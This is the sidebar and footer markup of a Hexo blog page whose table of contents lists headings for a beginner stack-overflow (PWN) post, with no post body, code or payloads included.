          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#PWN-%E7%AE%80%E5%8D%95%E6%A0%88%E6%BA%A2%E5%87%BA"><span class="nav-number">1.</span> <span class="nav-text">PWN-简单栈溢出</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BB%8B%E7%BB%8D"><span class="nav-number">2.</span> <span class="nav-text">介绍</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9F%BA%E6%9C%AC%E6%A0%88%E4%BB%8B%E7%BB%8D-%C2%B6"><span class="nav-number">2.1.</span> <span class="nav-text">基本栈介绍 </span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%F0%9F%94%8D-System-V-AMD64-ABI-vs-Microsoft-x64-ABI-%E5%AF%B9%E6%AF%94"><span class="nav-number">2.2.</span> <span class="nav-text">🔍 System V AMD64 ABI vs Microsoft x64 ABI 对比</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%F0%9F%A7%AE-%E5%AE%9E%E9%99%85%E8%B7%B3%E8%BD%AC%E5%9C%B0%E5%9D%80%E8%AE%A1%E7%AE%97%E6%96%B9%E5%BC%8F"><span class="nav-number">2.3.</span> <span class="nav-text">🧮 实际跳转地址计算方式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%8D%E7%94%A8%E7%BB%9D%E5%AF%B9%E5%9C%B0%E5%9D%80%EF%BC%9F"><span class="nav-number">2.4.</span> <span class="nav-text">为什么不用绝对地址？</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%A0%88%E6%BA%A2%E5%87%BA"><span class="nav-number">3.</span> <span class="nav-text">栈溢出</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BB%93%E6%9D%9F"><span class="nav-number">4.</span> <span class="nav-text">结束</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Chow"
      src="https://octodex.github.com/images/steroidtocat.png">
  <p class="site-author-name" itemprop="name">Chow</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">13</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Chow</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>
-->

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
